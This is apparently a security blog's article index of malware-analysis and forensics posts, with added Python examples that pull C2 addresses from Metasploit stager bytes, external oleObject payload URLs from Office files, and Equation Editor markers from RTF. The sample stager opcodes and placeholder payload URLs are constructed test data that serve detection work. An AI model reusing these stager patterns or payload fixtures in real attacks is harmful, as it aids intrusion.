Article list
2021-09-27 15:37 CVE-2021-38647 OMIGod Exploitation Log Analysis using Kusto Query Language #NULL0X4D5A #Security Articles Introduction: This post walks you through the log analysis of OMIGod vulnerability exploitation artefacts using Kusto Query Language (KQL). The raw JSON logs from the exploited Linux device are fetched into Azure Data Explorer using the externaldata() function and analysed in a KQL instance. I have been lea
2021-02-12 17:57 CyberChef - YARA - The pattern matching Swiss knife #NULL0X4D5A #Security Articles One of the best features of CyberChef is YARA: YARA rules can be run against a given file to classify it and gain knowledge about it, and they quickly give an understanding of the file's basic characteristics. Follow the demo below to learn how to use YARA rules in CyberChef. CyberChef - htt
2020-09-28 16:55 Decode FIN6 Cobalt Strike stagers #NULL0X4D5A #Security Articles This post explains how to decode FIN6 Cobalt Strike stagers using CyberChef and scdbg. Attackers leverage Pastebin to host Cobalt Strike stagers or malicious droppers, and a few of them are still active on Pastebin even though the final C2 domains are no longer active. Below is one of those Pastebin htt
2020-07-20 03:52 Dridex shellcode analysis using scdbg #NULL0X4D5A #Security Articles This post explains how to use scdbg to analyse one type of shellcode generated by the Metasploit Framework or Cobalt Strike to get the C2 domain/IP address, so that the incident responder can identify and block further adversary activity. FYI, this post doesn't cover the initial infec
2019-06-27 13:31 Decoding Metasploit and CobaltStrike shells #NULL0X4D5A #Security Articles Introduction: This post is about how to decode one type of shellcode generated by the Metasploit Framework and Cobalt Strike to get the C2 domain/IP address, so that the incident responder can identify and block further adversary activity. FYI, this post doesn't cover the initial infection vector
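The C2 recovery that the two shellcode posts above (Dridex shellcode analysis using scdbg, and Decoding Metasploit and CobaltStrike shells) describe can also be done statically, without emulating the stager. The following is an added example written for this page, not code from the original posts. It relies on the fact that the Metasploit x86 reverse_tcp stager pushes the sockaddr_in onto the stack as two immediates (push <ip>; push <AF_INET|port>), and on the assumption that the x64 stager loads the same structure as a single 64-bit immediate into a REX.W register. The sample byte strings are constructed for the example and are not real stagers; the host names in them are placeholders.

```python
import re
import socket
import struct

# Metasploit x86 reverse_tcp stagers build the sockaddr_in on the stack with two
# immediate pushes:
#   68 <ip, 4 bytes>      push <host>            (e.g. 68 7f 00 00 01 -> 127.0.0.1)
#   68 02 00 <port BE>    push AF_INET | port    (e.g. 68 02 00 11 5c -> port 4444)
X86_SOCKADDR = re.compile(rb"\x68(.{4})\x68\x02\x00(.{2})", re.DOTALL)

# Assumed x64 encoding: the whole sockaddr_in as an imm64 into r8..r15
# (REX.W+B, opcode B8+r), e.g.  49 bc 02 00 <port BE> <ip, 4 bytes>  = mov r12, imm64
X64_SOCKADDR = re.compile(rb"\x49[\xb8-\xbf]\x02\x00(.{2})(.{4})", re.DOTALL)


def extract_reverse_tcp(shellcode: bytes) -> list:
    """Return [(arch, ip, port), ...] for every sockaddr_in pattern found."""
    hits = []
    for m in X86_SOCKADDR.finditer(shellcode):
        ip = socket.inet_ntoa(m.group(1))
        port = struct.unpack(">H", m.group(2))[0]
        hits.append(("x86", ip, port))
    for m in X64_SOCKADDR.finditer(shellcode):
        port = struct.unpack(">H", m.group(1))[0]
        ip = socket.inet_ntoa(m.group(2))
        hits.append(("x64", ip, port))
    return hits


def extract_strings(shellcode: bytes, min_len: int = 6) -> list:
    """Heuristic for HTTP/HTTPS stagers: host and URI live as NUL-terminated
    ASCII strings appended to the stager, so long printable runs are candidates."""
    return [s.decode() for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, shellcode)]


# Constructed samples (not real stagers): just enough bytes to exercise the patterns.
SAMPLE_X86 = bytes.fromhex(
    "fce8820000006089e531c0"   # block_api prologue: cld; call; pushad; mov ebp,esp; xor eax,eax
    "687f000001"               # push 0x0100007f   -> 127.0.0.1
    "680200115c"               # push 0x5c110002   -> AF_INET, port 4444
    "89e6"                     # mov esi, esp
)
SAMPLE_X64 = bytes.fromhex(
    "4d31c9"                   # xor r9, r9
    "49bc020020fb0a000005"     # mov r12, imm64    -> AF_INET, port 8443, 10.0.0.5
    "4154"                     # push r12
) + b"\x00" + b"update.example.test\x00/jquery-3.3.1.min.js\x00"   # placeholder host/URI tail

if __name__ == "__main__":
    for arch, ip, port in extract_reverse_tcp(SAMPLE_X86 + SAMPLE_X64):
        print(f"{arch}: {ip}:{port}")
    print(extract_strings(SAMPLE_X64))
```

Feed the function the raw bytes after the stager has been decoded from its transport (hex, base64 or XOR, as the posts do with CyberChef); the patterns are for the plain stager, and a packed or encoded blob will simply return no hits.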
2019-02-01 19:18 Mimikatz Process Doppelganging #NULL0X4D5A #Security Articles This post is just about running a tool created by hasherezade to perform process doppelganging. All credit goes to the researchers Tal Liberman and Eugene Kogan from enSilo, and also to hasherezade. I just wanted to simulate the same process doppelganging and detect it with pe-sieve,
2019-01-26 17:22 Maldoc external relationship with type oleObject #NULL0X4D5A #Security Articles Introduction: Phishing malicious documents can contain an external relationship with type oleObject. A defender's objective is to kill the attack at an early stage by blocking malicious domains at the perimeter; this post leverages CyberChef to extract payload URLs quickly from malicious
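The extraction the entry above performs with CyberChef, done with the standard library so it can run over a whole quarantine folder, as an added example that is not code from the original post. An OOXML document is a zip; each `.rels` part lists relationships, and a relationship of type oleObject with `TargetMode="External"` points Office at a URL to fetch. The example also watches attachedTemplate and frame relationships, which appear with External targets in other phishing documents; that list is an assumption and can be extended. The sample package and its URL are constructed for the example.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_OBJECT = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
# Relationship types worth reporting when TargetMode="External" (assumed list).
WATCHED_TYPES = {
    OLE_OBJECT: "oleObject",
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate": "attachedTemplate",
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame": "frame",
}


def find_external_targets(docx: bytes) -> list:
    """Walk every *.rels part in the package and return
    (part, relationship id, short type, target) for each watched External relationship."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(z.read(name))
            except ET.ParseError:
                continue          # damaged part: skip it rather than abort the whole scan
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                rtype = rel.get("Type", "")
                # TargetMode defaults to Internal when absent; embedded objects stay silent.
                if rtype in WATCHED_TYPES and rel.get("TargetMode", "Internal") == "External":
                    hits.append((name, rel.get("Id"), WATCHED_TYPES[rtype], rel.get("Target")))
    return hits


def build_sample_docx() -> bytes:
    """Constructed minimal package: one external oleObject relationship (the pattern the
    post extracts) and one embedded oleObject that must not be reported."""
    rels = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
<Relationship Id="rId2" Type="{OLE_OBJECT}" Target="http://payload.example.test/update.doc" TargetMode="External"/>
<Relationship Id="rId3" Type="{OLE_OBJECT}" Target="embeddings/oleObject1.bin"/>
</Relationships>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")      # placeholder body, never parsed here
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for part, rid, kind, target in find_external_targets(build_sample_docx()):
        print(f"{part}: {rid} {kind} -> {target}")
```

The returned target is what goes to the perimeter block list; the relationship id is useful when you then look for the matching `r:id` in `word/document.xml` to see whether the object is set to update on open.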
2018-12-18 17:50 Malicious office doc with process hollowing shellcode #NULL0X4D5A #Security Articles Introduction: This post covers how to identify and extract shellcode manually from a Hancitor phishing Office document. Refer to Part-1 and Part-2 for an understanding of the tools and approach used to analyse phishing documents. Tools: Didier Stevens Suite sud
2018-07-19 21:43 Malicious office document analysis Part-3 #NULL0X4D5A #Security Articles Introduction: This post covers how to identify and extract potentially malicious content, such as embedded executables and payloads, from macro forms in Office documents. Refer to Part-1 and Part-2 for an understanding of the tools and approach used to analyse phishing documents. Tools: Didier Stevens Suite
2018-06-16 03:18 Malicious document analysis Part-2 #NULL0X4D5A #Security Articles Introduction: A basic and quick approach to analysing phishing documents to identify indicators of maliciousness. Refer to Part-1 to understand the tools and approach for analysing Office Word documents. This post covers the static analysis of PDF documents to identify suspicious objects. (FYI
2018-04-09 01:24 Malicious document analysis Part - 1 #NULL0X4D5A #Security Articles Introduction: A basic and quick approach to analysing phishing documents to identify indicators of maliciousness. FYI, this post doesn't cover a complete and in-depth analysis of malicious documents. Tools: Didier Stevens Suite; sudo pip install oletools; YARA - A pattern matching Swiss
2018-03-17 00:50 Memory dump analysis of Donny's System #NULL0X4D5A #Security Articles Introduction: This post solves the mystery of Donny's System and outlines how to use memory forensics methodology to uncover artifacts from memory dumps. Tools: Volatility, YARA and Windows PowerShell. Analysis: the six-step investigative methodology by SANS. Identify rogue processes
2018-01-24 04:12 What happened ..?? #NULL0X4D5A #Security Articles Introduction: Below is the memory dump of Donny's system. He's not happy with what's going on in it :(. Find out what happened. Link: https://mega.nz/#F!0moF0RaC!H2W9tUNs5Pjk1PA_p7dudA SHA256: 3E4FF07DA0D18E0387D0A6E8A0FA936974A652EB30D1FB3A4E61CA391E731944 Hint: Use Volatility or Rekall Memor
2018-01-04 23:13 CVE-2017-11882 technical analysis #NULL0X4D5A #Security Articles Introduction: This post explains how to analyse an Office RTF document to identify the CVE-2017-11882 vulnerability. Microsoft Equation Editor, a Microsoft Office component, contains a stack buffer overflow vulnerability that enables remote code execution on a vulnerable system. The component was c
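A first-pass triage for the RTF case described in the entry above, as an added example that is not code from the original post: before any debugging, the question is simply whether the document embeds an Equation Editor object at all. Word writes embedded objects into `\objdata` as a hex-encoded OLE 1.0 header (version, format id, length-prefixed class, topic and item names, then the native data); Equation Editor objects identify themselves by the class name `Equation.3`, by the CLSID `{0002CE02-0000-0000-C000-000000000046}` stored inside the native compound file, and by the `Equation Native` stream that carries the MTEF data. The example decodes `\objdata`, parses the OLE 1.0 header and reports those markers. The sample RTF is constructed for the example: its native data is a stub carrying only the markers, not a real MTEF stream and not exploit data, and the overflowing font record itself is not reproduced.

```python
import re

# Equation Editor 3.0 CLSID {0002CE02-0000-0000-C000-000000000046}, as laid out on disk.
EQUATION_CLSID = bytes.fromhex("02ce020000000000c000000000000046")
# Directory entry name of the stream holding MTEF data (UTF-16LE inside the CFB).
EQUATION_NATIVE = "Equation Native".encode("utf-16-le")

OBJCLASS_RE = re.compile(rb"\\objclass\s+([^\s{}\\]+)")
OBJDATA_RE = re.compile(rb"\\objdata\s*([0-9a-fA-F\s]+)")


def _u32(b: bytes, off: int) -> int:
    return int.from_bytes(b[off:off + 4], "little")


def parse_ole1(blob: bytes):
    """Parse the OLE 1.0 object header found in \\objdata:
    version, format id, class/topic/item names (u32 length + bytes), native data."""
    if len(blob) < 12:
        return None
    hdr = {"version": _u32(blob, 0), "format": _u32(blob, 4)}
    off, names = 8, []
    for _ in range(3):
        n = _u32(blob, off)
        off += 4
        names.append(blob[off:off + n].rstrip(b"\x00").decode("latin-1", "replace"))
        off += n
    hdr["classname"], hdr["topic"], hdr["item"] = names
    size = _u32(blob, off)
    hdr["native"] = blob[off + 4:off + 4 + size]
    return hdr


def analyse_rtf(rtf: bytes) -> list:
    """One finding per \\objdata blob: declared class, OLE1 class, Equation markers."""
    objclasses = [m.group(1).decode("latin-1") for m in OBJCLASS_RE.finditer(rtf)]
    findings = []
    for i, m in enumerate(OBJDATA_RE.finditer(rtf)):
        hexstr = re.sub(rb"\s", b"", m.group(1))
        if len(hexstr) % 2:          # obfuscated samples may leave a dangling nibble
            hexstr = hexstr[:-1]
        blob = bytes.fromhex(hexstr.decode())
        ole1 = parse_ole1(blob) or {}
        f = {
            "objclass": objclasses[i] if i < len(objclasses) else None,
            "ole1_classname": ole1.get("classname"),
            "equation_clsid": EQUATION_CLSID in blob,
            "equation_native_stream": EQUATION_NATIVE in blob,
        }
        # \objclass can be omitted or spelt in mixed case by exploit builders, so the
        # class name is checked case-insensitively and the binary markers count on their own.
        names = " ".join(x for x in (f["objclass"], f["ole1_classname"]) if x).lower()
        f["suspicious"] = "equation" in names or f["equation_clsid"] or f["equation_native_stream"]
        findings.append(f)
    return findings


def build_sample_rtf() -> bytes:
    """Constructed RTF with an Equation.3 OLE1 object; native data is a marker stub only."""
    native = (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 8      # CFB magic + padding
              + EQUATION_NATIVE + b"\x00\x00" + EQUATION_CLSID)
    classname = b"Equation.3\x00"
    ole1 = (b"\x01\x05\x00\x00"                                     # OLE version
            + b"\x02\x00\x00\x00"                                   # format id 2 = embedded
            + len(classname).to_bytes(4, "little") + classname
            + b"\x00\x00\x00\x00"                                   # topic name: empty
            + b"\x00\x00\x00\x00"                                   # item name: empty
            + len(native).to_bytes(4, "little") + native)
    hexdata = ole1.hex().encode()
    wrapped = b"\r\n".join(hexdata[i:i + 64] for i in range(0, len(hexdata), 64))
    return (b"{\\rtf1\\ansi\\deff0 {\\object\\objemb{\\*\\objclass Equation.3}"
            b"{\\*\\objdata " + wrapped + b"}}\\par}")


if __name__ == "__main__":
    for f in analyse_rtf(build_sample_rtf()):
        print(f)
```

A hit here means the document deserves the full treatment the post goes on to give (extracting the native data with rtfobj or the Didier Stevens tools and reading the MTEF font record); a miss does not clear the file, since objects can be split across `\objdata` control words or hidden behind other RTF tricks that this regex does not unwind.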
2017-11-01 21:04 Extracting encrypted contents from Kronos Banking Trojan #NULL0X4D5A #Security Articles Introduction: This post explains how to identify and extract encrypted contents stashed away in the resource section of malware. It's a common technique used by malware authors to make analysis more difficult; the current analysis uses pestudio for initial analysis, using signsrch to id